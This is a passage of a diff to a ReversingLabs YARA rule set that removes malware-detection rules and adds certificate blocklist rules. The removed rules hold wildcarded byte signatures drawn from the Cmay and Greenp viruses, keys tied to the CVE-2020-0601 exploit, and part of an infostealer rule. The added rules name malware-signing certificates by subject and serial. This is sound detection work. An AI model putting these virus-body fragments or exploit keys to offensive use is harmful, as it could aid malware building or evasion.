?? ?? ?? E8 3A 02 00 00 0F 82 7C 03 00 00 8D B5 - ?? ?? ?? ?? 8D BD ?? ?? ?? ?? E8 4F 02 00 00 E8 05 00 00 00 E9 61 03 - 00 00 8D BD ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 03 6A 7F 57 FF 95 ?? ?? ?? - ?? 83 C7 7F 6A 7F 57 FF 95 ?? ?? ?? ?? 83 C7 7F 57 6A 7F FF 95 ?? ?? - ?? ?? 8D BD ?? ?? ?? ?? 80 BD ?? ?? ?? ?? 00 0F 84 20 03 00 00 FE 8D - ?? ?? ?? ?? 57 FF 95 ?? ?? ?? ?? 83 C7 7F 8D 9D ?? ?? ?? ?? 53 8D 9D - ?? ?? ?? ?? 53 FF 95 ?? ?? ?? ?? 83 F8 FF 74 CA 89 85 ?? ?? ?? ?? FF - 85 ?? ?? ?? ?? E8 C0 02 00 00 83 F8 FF 74 75 E8 70 02 00 00 85 C0 74 - 6C 8B 85 ?? ?? ?? ?? 8B 50 3C 3B 95 ?? ?? ?? ?? 73 5B 03 D0 8B 02 35 - 96 23 00 00 3D C6 66 00 00 75 4B 81 7A 4C 53 54 30 00 74 42 52 FF B5 - ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 5A FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? - E8 79 00 00 00 8F 85 ?? ?? ?? ?? 8F 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? - 05 7E 0E 80 BD ?? ?? ?? ?? 00 0F 85 40 FF FF FF C3 57 8D BD ?? ?? ?? - ?? B9 04 01 00 00 32 C0 F3 AA 5F FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? - FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? - ?? 8D 9D ?? ?? ?? ?? 53 FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 85 C0 74 - 05 E9 2A FF FF FF E9 E9 FE FF FF 8B B5 ?? ?? ?? ?? 81 C6 ?? ?? ?? ?? - 8B 5A 3C E8 87 01 00 00 89 B5 ?? ?? ?? ?? E8 8B 01 00 00 33 DB 8B 95 - ?? ?? ?? ?? 8B 42 3C 03 D0 0F B7 42 06 48 6B C0 28 0F B7 5A 14 83 C3 - 18 03 DA 03 C3 8B 58 10 03 58 14 03 9D ?? ?? ?? ?? 53 8B 4A 28 89 8D - ?? ?? ?? ?? 8B 4A 34 89 8D ?? ?? ?? ?? 8B 48 0C 03 48 10 89 8D ?? ?? - ?? ?? 89 4A 28 8B 70 10 81 C6 ?? ?? ?? ?? 8B 5A 3C E8 1D 01 00 00 89 - 70 10 89 70 08 03 70 0C 89 72 50 81 48 24 20 00 00 A0 C7 42 4C 53 54 - } - $cmay_body_2 = { - 30 00 5B B9 ?? ?? ?? ?? FC 8B FB 8D B5 ?? ?? ?? ?? F3 A4 FF B5 ?? ?? - ?? ?? FF 95 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? FF B5 ?? - ?? ?? ?? FF 95 ?? ?? ?? ?? C3 50 51 B9 05 00 00 00 8B 44 24 2E 25 00 - 00 FF FF 66 81 38 4D 5A 74 09 2D 00 00 01 00 E2 F2 EB 06 89 85 ?? ?? - ?? ?? 59 58 74 01 F9 C3 56 8B 95 ?? ?? ?? ?? 8B 72 3C 03 F2 8B 76 78 - 03 F2 83 C6 1C AD 03 C2 89 85 ?? ?? ?? ?? AD 03 C2 89 85 ?? ?? ?? ?? - AD 03 C2 89 85 ?? ?? ?? ?? 5E 57 E8 16 00 00 00 5F 89 07 83 C7 04 80 - 3E 88 C7 85 ?? ?? ?? ?? 00 00 00 00 75 E5 C3 8B DE 80 3E 00 74 03 46 - EB F8 46 8B CE 2B CB 8B F3 8B BD ?? ?? ?? ?? 57 8B 3F 03 FA 51 F3 A6 - 74 0F 8B F3 59 5F 83 C7 04 FF 85 ?? ?? ?? ?? EB E7 59 5F 8B 85 ?? ?? - ?? ?? D1 E0 03 85 ?? ?? ?? ?? 33 DB 66 8B 18 C1 E3 02 03 9D ?? ?? ?? - ?? 8B 1B 03 DA 8B C3 C3 50 52 33 D2 8B C6 F7 F3 2B DA 03 F3 5A 58 C3 - 8B 85 ?? ?? ?? ?? 6A 00 50 6A 00 6A 04 6A 00 FF B5 ?? ?? ?? ?? FF 95 - ?? ?? ?? ?? 85 C0 74 1E 89 85 ?? ?? ?? ?? 6A 00 6A 00 6A 00 6A 02 FF - B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 85 C0 75 02 33 C0 89 85 ?? ?? ?? ?? - C3 33 C0 50 68 80 00 00 00 6A 03 50 40 50 68 00 00 00 C0 8D B5 ?? ?? - ?? ?? 56 FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C3 85 ED 0F 84 2A 04 00 - 00 33 C0 05 ?? ?? ?? ?? 05 ?? ?? ?? ?? FF E0 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Orca System" and pe.signatures[i].serial=="02:de:1c:c6:c4:87:95:45:92:f1:bf:57:4c:a2:b0:00" and 1613735394<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_A32B8B4F1Be43C23Eb2848Ab4Ef06Bb2 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "2ced71bb-622c-5597-91c3-210b9b5f3a4e" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11612-L11630" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "dd7d44349baaf4a2e2f61b38cef31f288110bb03944fd4593f52a0ab03b9d172" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ($cmay_body_1 at pe.entry_point) and $cmay_body_2 + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Pak El AB" and (pe.signatures[i].serial=="00:a3:2b:8b:4f:1b:e4:3c:23:eb:28:48:ab:4e:f0:6b:b2" or pe.signatures[i].serial=="a3:2b:8b:4f:1b:e4:3c:23:eb:28:48:ab:4e:f0:6b:b2") and 1673395200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Win32_Virus_Greenp : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Cert_Blocklist_626735Ed30E50E3E0553986D806Bfc54 : INFO FILE { meta: - description = "Yara rule that detects Greenp virus." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "5751e91c-652b-59bd-93b8-ece677ad4911" - date = "2020-07-15" - modified = "2020-07-15" + id = "e0cfc0e6-b36e-5d4e-bfe6-21f13499dc0c" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/virus/Win32.Virus.Greenp.yara#L3-L46" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ca6df34ee2ad9d93e35b0d1a2d4765f681f3981ffe2786bbc822c3090212fd02" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11632-L11648" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "0a2acf8528a12fd05cf58c2ed5224f7472d14251b342ce4df6d9c10c6a6decfc" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Virus" - tc_detection_name = "Greenp" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $greenp_body_1 = { - 68 ?? ?? ?? ?? 60 FC E8 4E 05 00 00 E8 31 04 00 00 0F 82 93 00 00 00 80 BD ?? ?? ?? ?? 01 75 63 FF 95 ?? ?? ?? ?? 6A 01 - 50 FF 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A 00 6A 00 FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 EC 18 8B FC - 6A 00 6A 00 6A 00 57 FF 95 ?? ?? ?? ?? 85 C0 74 10 57 FF 95 ?? ?? ?? ?? 57 FF 95 ?? ?? ?? ?? EB DF 68 ?? ?? ?? ?? 6A 00 - FF 95 ?? ?? ?? ?? 83 C4 18 EB 27 8D 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? ?? 85 C0 75 16 8D 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? - ?? 85 C0 74 05 E8 81 00 00 00 61 58 FF E0 ?? E8 04 00 00 00 [4] 8B 3C 24 81 EC 00 01 00 00 8B F4 56 68 00 01 00 00 FF - 95 ?? ?? ?? ?? AC AA 81 C4 00 01 00 00 FF 95 ?? ?? ?? ?? 83 F8 03 75 2D 83 EC 10 8B F4 56 8D 46 04 50 8D 46 08 50 8D 46 - 0C 50 4F 57 FF 95 ?? ?? ?? ?? 8B 46 04 2B D2 F7 66 08 F7 66 0C 83 C4 10 3D 00 00 40 06 C3 [27] 81 EC ?? ?? ?? ?? 8B F4 - 68 ?? ?? ?? ?? 56 FF 95 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 8A 17 88 14 06 40 47 80 FA 00 75 F4 68 ?? ?? ?? ?? 6A 00 FF 95 ?? - ?? ?? ?? 97 56 57 B9 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? E8 3A 02 00 00 5F B8 ?? ?? ?? ?? 99 68 ?? ?? ?? ?? 59 F7 F1 40 F7 E1 - 8B 57 3C 03 D7 0F B7 5A 14 8D 5C 13 40 8B 72 28 03 72 34 89 B5 ?? ?? ?? ?? C7 42 10 80 67 D5 40 FF 73 10 01 43 10 8B 43 - 10 05 ?? ?? ?? ?? 89 43 08 58 03 43 0C 89 42 28 52 B8 ?? ?? ?? ?? 99 68 ?? ?? ?? ?? 59 F7 F1 40 F7 E1 5A 01 43 10 01 42 - 50 81 42 50 ?? ?? ?? ?? 57 C6 85 ?? ?? ?? ?? 01 81 C7 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? B9 ?? ?? ?? ?? FC F3 A4 C6 85 ?? ?? - ?? ?? 00 5F 5E 6A 00 6A 00 6A 02 6A 00 6A 00 68 00 00 00 C0 56 FF 95 ?? ?? ?? ?? 93 50 8B C4 6A 00 50 B8 ?? ?? ?? ?? 99 - } - $greenp_body_2 = { - 68 ?? ?? ?? ?? 59 F7 F1 40 F7 E1 50 57 53 FF 95 ?? ?? ?? ?? 58 57 FF 95 ?? ?? ?? ?? 53 FF 95 ?? ?? ?? ?? 6A 00 56 FF 95 - ?? ?? ?? ?? 50 50 8B FC 8D 57 04 2B C0 52 57 50 68 3F 00 0F 00 50 50 50 8D 85 ?? ?? ?? ?? 50 68 02 00 00 80 FF 95 ?? ?? - ?? ?? 85 C0 75 1E 6A 0C 56 6A 01 6A 00 8D 85 ?? ?? ?? ?? 50 FF 37 FF 95 ?? ?? ?? ?? FF 37 FF 95 ?? ?? ?? ?? 81 C4 ?? ?? - ?? ?? C3 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "FISH ACCOUNTING & TRANSLATING LIMITED" and pe.signatures[i].serial=="62:67:35:ed:30:e5:0e:3e:05:53:98:6d:80:6b:fc:54" and 1666742400<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_34D42E871Ddb1C92Fa20B55B384E1259 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "98a8f4b0-08d0-5e09-b46e-74b46f4df223" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11650-L11666" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "8af5f4abe6425713b7c1fd17deaa78b2cfd6ef73ad960bce883e95661c2dbb56" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ($greenp_body_1 at pe.entry_point) and $greenp_body_2 + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VENS CORP" and pe.signatures[i].serial=="34:d4:2e:87:1d:db:1c:92:fa:20:b5:5b:38:4e:12:59" and 1630368000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Win32_Exploit_CVE20200601 : TC_DETECTION MALICIOUS EXPLOIT CVE_2020_0601 FILE +rule REVERSINGLABS_Cert_Blocklist_08D4Dc90047B8470Ccaf3924Dfbd8B5F : INFO FILE { meta: - description = "Yara rule that detects CVE-2020-0601 exploit." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "6a03fd5e-3b7f-5b71-b897-5cac81721a56" - date = "2020-07-15" - modified = "2020-07-15" + id = "2abe218a-1d93-5efe-9878-4314cf9ecdf7" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/exploit/Win32.Exploit.CVE20200601.yara#L3-L253" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "e4d915560ad72e0fde63276f9ffece00535c7983125efaa8298adc11d5e54817" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11668-L11684" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "569db2f6d6f4da9985c57812a03f91bce88f2150b17659249e0f746a0d15150b" score = 75 - quality = 88 - tags = "TC_DETECTION, MALICIOUS, EXPLOIT, CVE-2020-0601, FILE" + quality = 90 + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "EXPLOIT" - exploit = "CVE-2020-0601" - tc_detection_type = "Exploit" - tc_detection_name = "CVE-2020-0601" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $oid_prime_explicit = { - 06 07 2A 86 48 CE 3D 01 01 - } - $ecc_public_key_1 = { - 04 47 45 0E 96 FB 7D 5D BF E9 39 D1 21 F8 9F 0B - B6 D5 7B 1E 92 3A 48 59 1C F0 62 31 2D C0 7A 28 - FE 1A A7 5C B3 B6 CC 97 E7 45 D4 58 FA D1 77 6D - 43 A2 C0 87 65 34 0A 1F 7A DD EB 3C 33 A1 C5 9D - 4D A4 6F 41 95 38 7F C9 1E 84 EB D1 9E 49 92 87 - 94 87 0C 3A 85 4A 66 9F 9D 59 93 4D 97 61 06 86 - 4A - } - $ecc_public_key_2 = { - 04 84 13 C9 D0 BA 6D 41 7B E2 6C D0 EB 55 5F 66 - 02 1A 24 F4 5B 89 69 47 E3 B8 C2 7D F1 F2 02 C5 - 9F A0 F6 5B D5 8B 06 19 86 4F 53 10 6D 07 24 27 - A1 A0 F8 D5 47 19 61 4C 7D CA 93 27 EA 74 0C EF - 6F 96 09 FE 63 EC 70 5D 36 AD 67 77 AE C9 9D 7C - 55 44 3A A2 63 51 1F F5 E3 62 D4 A9 47 07 3E CC - 20 - } - $ecc_public_key_3 = { - 04 A7 56 7A 7C 52 DA 64 9B 0E 2D 5C D8 5E AC 92 - 3D FE 01 E6 19 4A 3D 14 03 4B FA 60 27 20 D9 83 - 89 69 FA 54 C6 9A 18 5E 55 2A 64 DE 06 F6 8D 4A - 3B AD 10 3C 65 3D 90 88 04 89 E0 30 61 B3 AE 5D - 01 A7 7B DE 7C B2 BE CA 65 61 00 86 AE DA 8F 7B - D0 89 AD 4D 1D 59 9A 41 B1 BC 47 80 DC 9E 62 C3 - F9 - } - $ecc_public_key_4 = { - 04 CD 0F 5B 56 82 DF F0 45 1A D6 AD F7 79 F0 1D - C9 AC 96 D6 9E 4E 9C 1F B4 42 11 CA 86 BF 6D FB - 85 A3 C5 E5 19 5C D7 EE A6 3F 69 67 D8 78 E2 A6 - C9 C4 DB 2D 79 2E E7 8B 8D 02 6F 31 22 4D 06 E3 - 60 72 45 9D 0E 42 77 9E CE CF E5 7F 85 9B 18 E4 - FC CC 2E 72 D3 16 93 4E CA 99 63 5C A1 05 2A 6C - 06 - } - $ecc_public_key_5 = { - 04 57 CF EA B3 39 4D 3F A1 21 E0 6E 2F 38 72 C6 - 87 97 F3 85 0B 47 E7 0F 51 C8 D1 F4 99 9B CA 59 - 65 FF 4C F9 EA 0B B7 25 D5 D2 F6 EC 31 2D 32 62 - 12 D7 76 86 A7 FA 38 C9 65 D4 FE 73 E2 84 39 F8 - 4C 49 62 13 DD BA D5 88 A0 5F 3D C8 4F B0 3F 8F - A1 50 11 E4 93 46 AD C3 5F CB F1 A4 6A 95 56 E8 - C0 - } - $ecc_public_key_6 = { - 04 D1 D9 4A 8E 4C 0D 84 4A 51 BA 7C EF D3 CC FA - 3A 9A B5 A7 63 13 3D 01 E0 49 3E FA C1 47 C9 92 - B3 3A D7 FE 6F 9C F7 9A 3A 0F F5 0E 0A 0A C3 3F - C8 E7 12 14 8E D5 D5 6D 98 2C B3 71 32 0A EB 2A - BD F6 D7 6A 20 0B 67 45 9C D2 B2 BF 53 22 66 09 - 5D DB 11 F3 F1 05 33 58 A3 E2 B8 CF 7C CD 82 9B - BD - } - $ecc_public_key_7 = { - 04 4A EE 58 AE 4D CA 66 DE 06 3A A3 11 FC E0 18 - F0 6E 1C BA 2D 30 0C 89 D9 D6 EE 9B 73 83 A9 23 - 15 8C 2F 59 8A 5A DD 14 EA 9D 59 2B 43 B7 06 EC - 32 B6 BA EE 41 B5 AD 5D A1 85 CC EA 1D 14 66 A3 - 67 7E 46 E2 94 F3 E7 B6 56 A1 15 59 A1 4F 37 97 - B9 22 1E BD 11 EB F4 B2 1F 5E C3 14 9A E5 D9 97 - 99 - } - $ecc_public_key_8 = { - 04 DD A7 D9 BB 8A B8 0B FB 0B 7F 21 D2 F0 BE BE - 73 F3 33 5D 1A BC 34 EA DE C6 9B BC D0 95 F6 F0 - CC D0 0B BA 61 5B 51 46 7E 9E 2D 9F EE 8E 63 0C - 17 EC 07 70 F5 CF 84 2E 40 83 9C E8 3F 41 6D 3B - AD D3 A4 14 59 36 78 9D 03 43 EE 10 13 6C 72 DE - AE 88 A7 A1 6B B5 43 CE 67 DC 23 FF 03 1C A3 E2 - 3E - } - $ecc_public_key_9 = { - 04 D7 66 B5 1B DB AE B3 60 EE 46 EA 88 63 75 3B - 2A 94 6D F3 5F 12 F6 E3 0F 9E B6 0A 14 53 48 52 - C8 DC 3A B3 CB 48 20 26 12 4E FA 89 84 D4 DF 91 - E4 29 7D 28 01 D9 DB 18 43 69 A1 1F B5 D3 86 16 - DC C7 7F 67 23 DF DF 31 31 83 03 35 70 B1 4B B7 - C8 17 BB 51 CB DC 94 17 DB EA 09 3B 76 12 DE AA - B5 - } - $ecc_public_key_10 = { - 04 15 B1 E8 FD 03 15 43 E5 AC EB 87 37 11 62 EF - D2 83 36 52 7D 45 57 0B 4A 8D 7B 54 3B 3A 6E 5F - 15 02 C0 50 A6 CF 25 2F 7D CA 48 B8 C7 50 63 1C - 2A 21 08 7C 9A 36 D8 0B FE D1 26 C5 58 31 30 28 - 25 F3 5D 5D A3 B8 B6 A5 B4 92 ED 6C 2C 9F EB DD - 43 89 A2 3C 4B 48 91 1D 50 EC 26 DF D6 60 2E BD - 21 - } - $ecc_public_key_11 = { - 04 03 47 7B 2F 75 C9 82 15 85 FB 75 E4 91 16 D4 - AB 62 99 F5 3E 52 0B 06 CE 41 00 7F 97 E1 0A 24 - 3C 1D 01 04 EE 3D D2 8D 09 97 0C E0 75 E4 FA FB - 77 8A 2A F5 03 60 4B 36 8B 16 23 16 AD 09 71 F4 - 4A F4 28 50 B4 FE 88 1C 6E 3F 6C 2F 2F 09 59 5B - A5 5B 0B 33 99 E2 C3 3D 89 F9 6A 2C EF B2 D3 06 - E9 - } - $ecc_public_key_12 = { - 04 92 A0 41 E8 4B 82 84 5C E2 F8 31 11 99 86 64 - 4E 09 25 2F 9D 41 2F 0A AE 35 4F 74 95 B2 51 64 - 6B 8D 6B E6 3F 70 95 F0 05 44 47 A6 72 38 50 76 - 95 02 5A 8E AE 28 9E F9 2D 4E 99 EF 2C 48 6F 4C - 25 29 E8 D1 71 5B DF 1D C1 75 37 B4 D7 FA 7B 7A - 42 9C 6A 0A 56 5A 7C 69 0B AA 80 09 24 6C 7E C1 - 46 - } - $ecc_public_key_13 = { - 04 A2 D5 9C 82 7B 95 9D F1 52 78 87 FE 8A 16 BF - 05 E6 DF A3 02 4F 0D 07 C6 00 51 BA 0C 02 52 2D - 22 A4 42 39 C4 FE 8F EA C9 C1 BE D4 4D FF 9F 7A - 9E E2 B1 7C 9A AD A7 86 09 73 87 D1 E7 9A E3 7A - A5 AA 6E FB BA B3 70 C0 67 88 A2 35 D4 A3 9A B1 - FD AD C2 EF 31 FA A8 B9 F3 FB 08 C6 91 D1 FB 29 - 95 - } - $ecc_public_key_14 = { - 04 98 E9 2F 3D 40 72 A4 ED 93 22 72 81 13 1C DD - 10 95 F1 C5 A3 4E 71 DC 14 16 D9 0E E5 A6 05 2A - 77 64 7B 5F 4E 38 D3 BB 1C 44 B5 7F F5 1F B6 32 - 62 5D C9 E9 84 5B 4F 30 4F 11 5A 00 FD 58 58 0C - A5 F5 0F 2C 4D 07 47 13 75 DA 97 97 97 6F 31 5C - ED 2B 9D 7B 20 3B D8 B9 54 D9 5E 99 A4 3A 51 0A - 31 - } - $ecc_public_key_15 = { - 04 0D 30 5E 1B 15 9D 03 D0 A1 79 35 B7 3A 3C 92 - 7A CA 15 1C CD 62 F3 9C 26 5C 07 3D E5 54 FA A3 - D6 CC 12 EA F4 14 5F E8 8E 19 AB 2F 2E 48 E6 AC - 18 43 78 AC D0 37 C3 BD B2 CD 2C E6 47 E2 1A E6 - 63 B8 3D 2E 2F 78 C4 4F DB F4 0F A4 68 4C 55 72 - 6B 95 1D 4E 18 42 95 78 CC 37 3C 91 E2 9B 65 2B - 29 - } - $ecc_public_key_16 = { - 04 1A AC 54 5A A9 F9 68 23 E7 7A D5 24 6F 53 C6 - 5A D8 4B AB C6 D5 B6 D1 E6 73 71 AE DD 9C D6 0C - 61 FD DB A0 89 03 B8 05 14 EC 57 CE EE 5D 3F E2 - 21 B3 CE F7 D4 8A 79 E0 A3 83 7E 2D 97 D0 61 C4 - F1 99 DC 25 91 63 AB 7F 30 A3 B4 70 E2 C7 A1 33 - 9C F3 BF 2E 5C 53 B1 5F B3 7D 32 7F 8A 34 E3 79 - 79 - } - $ecc_public_key_17 = { - 04 E1 FD 8E B8 43 24 AB 96 7B 85 C2 BA 0B AD 8D - E0 3A E3 24 B9 D2 B1 BE 88 3A CA BF 4A B8 F9 EF - 2C 2F AF 51 50 3C 47 75 6C F8 94 B7 9B FC 28 1E - C5 54 CC 63 9D 16 4B 53 C1 E7 20 AB CD AC 25 D2 - 7F 8F C2 C1 5A 82 5E 30 8B 7A 54 CE 03 B5 91 7F - AA 94 D0 D1 8A 48 CC 82 05 26 A1 D5 51 12 D6 7B - 36 - } - $ecc_public_key_18 = { - 04 19 E7 BC AC 44 65 ED CD B8 3F 58 FB 8D B1 57 - A9 44 2D 05 15 F2 EF 0B FF 10 74 9F B5 62 52 5F - 66 7E 1F E5 DC 1B 45 79 0B CC C6 53 0A 9D 8D 5D - 02 D9 A9 59 DE 02 5A F6 95 2A 0E 8D 38 4A 8A 49 - C6 BC C6 03 38 07 5F 55 DA 7E 09 6E E2 7F 5E D0 - 45 20 0F 59 76 10 D6 A0 24 F0 2D DE 36 F2 6C 29 - 39 - } - $ecc_public_key_19 = { - 04 B8 C6 79 D3 8F 6C 25 0E 9F 2E 39 19 1C 03 A4 - AE 9A E5 39 07 09 16 CA 63 B1 B9 86 F8 8A 57 C1 - 57 CE 42 FA 73 A1 F7 65 42 FF 1E C1 00 B2 6E 73 - 0E FF C7 21 E5 18 A4 AA D9 71 3F A8 D4 B9 CE 8C - 1D - } - $ecc_public_key_20 = { - 04 C7 11 16 2A 76 1D 56 8E BE B9 62 65 D4 C3 CE - B4 F0 C3 30 EC 8F 6D D7 6E 39 BC C8 49 AB AB B8 - E3 43 78 D5 81 06 5D EF C7 7D 9F CE D6 B3 90 75 - DE 0C B0 90 DE 23 BA C8 D1 3E 67 E0 19 A9 1B 86 - 31 1E 5F 34 2D EE 17 FD 15 FB 7E 27 8A 32 A1 EA - C9 8F C9 7E 18 CB 2F 3B 2C 48 7A 7D A6 F4 01 07 - AC - } - $ecc_public_key_21 = { - 04 DE CD BB 70 20 F1 25 20 B4 94 E8 D7 B4 3B 0F - 6E 87 DD AB AC CF 4D 40 2F 81 33 6B 59 09 18 D6 - 87 0D 26 23 9C B4 8D 95 9D 76 9F A5 B9 06 42 E6 - AD 36 B2 C4 B3 AE 7A 3C 08 D5 CB 9D 3A 5E 45 21 - 6C 0B E3 20 F5 9B C2 DD 44 33 E3 42 B9 EA F2 28 - 42 92 AA FE 0C 07 CA 8A 13 99 3B 62 00 ED DA F3 - 35 - } - $ecc_public_key_22 = { - 04 5C D1 EE 57 0D D1 EF 81 7C 26 91 62 C3 6B E7 - FC 73 A9 A0 C3 37 44 DC D6 F8 31 E2 77 93 5F 8F - EB E3 ED 38 73 F5 FC 8B 55 B9 14 A5 8F 2C 44 28 - 19 AF 5D FB DE 09 58 C9 29 B3 A9 99 D3 75 13 3C - A9 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO Dibies" and pe.signatures[i].serial=="08:d4:dc:90:04:7b:84:70:cc:af:39:24:df:bd:8b:5f" and 1619136000<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_C2Fc83D458E653837Fcfc132C9B03062 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "135d638c-9ee5-52cf-a6e7-c12e4feef594" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11686-L11704" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "836cec8d8396680dd64f95d4dd41f7f5876cb4268d983238a01d2e0990cce74a" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ($oid_prime_explicit) and ( any of ($ecc_public_key_*)) and (pe.number_of_signatures>0) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO Vertical" and (pe.signatures[i].serial=="00:c2:fc:83:d4:58:e6:53:83:7f:cf:c1:32:c9:b0:30:62" or pe.signatures[i].serial=="c2:fc:83:d4:58:e6:53:83:7f:cf:c1:32:c9:b0:30:62") and 1602201600<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Infostealer_Projecthookpos : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_54C793D2224Bdd6Ca527Bb2B7B9Dfe9D : INFO FILE { meta: - description = "Yara rule that detects ProjectHookPOS infostealer." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "dcb96a99-c8c0-5878-a3a5-fe3cfeec43c6" - date = "2020-07-15" - modified = "2020-07-15" + id = "80e92980-f4eb-5ac2-9f68-14c352758791" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/infostealer/Win32.Infostealer.ProjectHookPOS.yara#L1-L98" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "b7534c9e905256aaf80f04b746a92c50689437b288f7e393ef13fde1740c4a4e" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11706-L11722" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "81c9c1d841d4aae3de229cc499ee84920d89928590a3eb157f7a7a7fbc46b4a8" score = 75 quality = 90 - tags = 